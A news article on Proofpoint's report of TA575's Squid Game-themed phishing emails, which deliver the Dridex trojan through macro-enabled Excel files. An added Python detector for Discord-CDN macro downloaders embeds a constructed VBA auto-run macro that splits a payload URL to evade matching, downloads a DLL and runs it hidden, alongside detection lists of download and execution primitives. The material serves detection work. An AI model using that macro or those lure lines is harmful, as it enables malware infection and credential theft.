Cyber criminals using Squid Game to distribute malware — Proofpoint

Proofpoint has found the TA575 group distributing the Dridex malware through emails with Squid Game-themed subject lines, such as:

  • Squid Game is back, watch new season before anyone else.
  • Invite for Customer to access the new sesason. [sic]
  • Squid game new season commercials casting preview
  • Get early access Squid Game season 2.
A screenshot of an email distributed by TA575, inviting the target to receive early access to Season 2 of Squid Game.
The malware-laced emails were found by Proofpoint to be from TA575, a cyber criminal organisation that’s been active for at least four years.

The emails, sent to targets across all industries and based primarily in the United States, tell recipients to fill out either an attached document to get early access to the new season of the show, or a talent form to become part of the background casting.

The attachments are Excel documents carrying macros that, if the recipient enables them, download the Dridex banking trojan (affiliate ID "22203") from URLs hosted on Discord.

A screenshot of one of the Excel documents distributed by TA575 and found by Proofpoint, with the Netflix logo inserted.

Dridex is a banking trojan distributed by multiple affiliates, including TA575, that can lead to data theft and installation of follow-on malware such as ransomware.
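The delivery chain described above (a macro-enabled Excel attachment that, once macros are enabled, fetches its payload from the Discord CDN) is something a mail-gateway or sandbox pipeline can check for once the macro source has been extracted, for instance with oletools' olevba. The following is an added example written for this article, not Proofpoint's or TA575's code: the two macro snippets are constructed for illustration, the two Discord CDN hostnames are the ones Discord actually serves uploaded attachments from, and the lists of download and execution primitives are a starting point rather than a complete catalogue.

```python
"""Triage extracted VBA macro source for Discord-CDN payload downloads.

Added example for this article, not Proofpoint's or TA575's code. Input is the
macro text (e.g. as dumped by oletools' olevba); both samples below are
constructed for illustration and are not real campaign artefacts.
"""
import re
from urllib.parse import urlparse

# Hosts from which Discord serves user-uploaded attachments.
DISCORD_CDN_HOSTS = {"cdn.discordapp.com", "media.discordapp.net"}

# Download and execution primitives that recur in macro downloaders
# (a starting point, not an exhaustive list).
DOWNLOAD_PRIMITIVES = ("URLDownloadToFile", "MSXML2.XMLHTTP",
                       "WinHttp.WinHttpRequest", "ADODB.Stream", "bitsadmin")
EXECUTION_PRIMITIVES = ("Shell", "WScript.Shell", "rundll32",
                        "regsvr32", "mshta", "CreateObject")

URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.IGNORECASE)
# "abc" & _ "def"  or  "abc" + "def"  ->  "abcdef": undo VBA string splitting
# (with optional line continuation) so a URL broken across literals reassembles.
CONCAT_RE = re.compile(r'"\s*[&+]\s*(?:_\s*)?"')


def join_split_strings(vba: str) -> str:
    """Collapse adjacent string literals joined with & or + into one literal."""
    return CONCAT_RE.sub("", vba)


def extract_urls(vba: str) -> list:
    """Return unique http(s) URLs in order of first appearance."""
    seen, urls = set(), []
    for url in URL_RE.findall(join_split_strings(vba)):
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


def is_discord_cdn_attachment(url: str) -> bool:
    """True for a Discord attachment URL (CDN host plus /attachments/ path)."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    return host in DISCORD_CDN_HOSTS and parsed.path.startswith("/attachments/")


def find_primitives(vba: str, names) -> list:
    """Case-insensitive substring match of known primitive names."""
    lowered = vba.lower()
    return [n for n in names if n.lower() in lowered]


def analyse_macro(vba: str) -> dict:
    """Summarise download/execution indicators and assign a coarse risk level."""
    urls = extract_urls(vba)
    cdn_urls = [u for u in urls if is_discord_cdn_attachment(u)]
    downloads = find_primitives(vba, DOWNLOAD_PRIMITIVES)
    execs = find_primitives(vba, EXECUTION_PRIMITIVES)
    if cdn_urls and downloads:
        risk = "high"    # full chain: a download primitive aimed at a Discord attachment
    elif cdn_urls or downloads:
        risk = "medium"  # one half of the chain; worth an analyst's look
    else:
        risk = "low"
    return {"urls": urls, "discord_cdn_urls": cdn_urls,
            "download_primitives": downloads,
            "execution_primitives": execs, "risk": risk}


# Constructed macro in the shape of a Discord-CDN downloader (not a real sample).
SAMPLE_MACRO = r'''
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Sub Workbook_Open()
    Dim u As String
    u = "https://cdn.discordapp.com/attach" & _
        "ments/881234567890123456/881234567890999999/casting_form.dll"
    URLDownloadToFile 0, u, Environ("TEMP") & "\cf.dll", 0, 0
    Shell "rundll32 " & Environ("TEMP") & "\cf.dll,DllRegisterServer", vbHide
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_MACRO = r'''
Sub Refresh()
    ' Opens the company intranet report page; no download, no execution.
    ThisWorkbook.FollowHyperlink "https://intranet.example.com/reports"
End Sub
'''

if __name__ == "__main__":
    for name, macro in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, analyse_macro(macro))
```

The string-joining step matters more than it looks: splitting a URL across concatenated literals is a cheap way to defeat a plain regex for `discordapp.com`, and reassembling the literals before matching closes that gap without needing a full VBA parser. Allowlisting the CDN hostnames alone is not enough either, since Discord also serves legitimate content from them; pairing the URL with a download primitive in the same macro is what lifts the verdict to "high".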

“TA575 is a Dridex affiliate tracked by Proofpoint since late 2020,” said Proofpoint analysts Axel F and Selena Larson, in the company’s blog post.

“This group distributes malware via malicious URLs, Microsoft Office attachments, and password-protected files. On average, TA575 sends thousands of emails per campaign impacting hundreds of organisations.

“TA575 also uses the Discord content delivery network (CDN) to host and distribute Dridex. Discord, a communications platform with consumer and enterprise uses, is an increasingly popular malware hosting service for cyber criminals.”

Aaron Hurst

Aaron Hurst is Information Age's senior reporter, providing news and features around the hottest trends across the tech industry.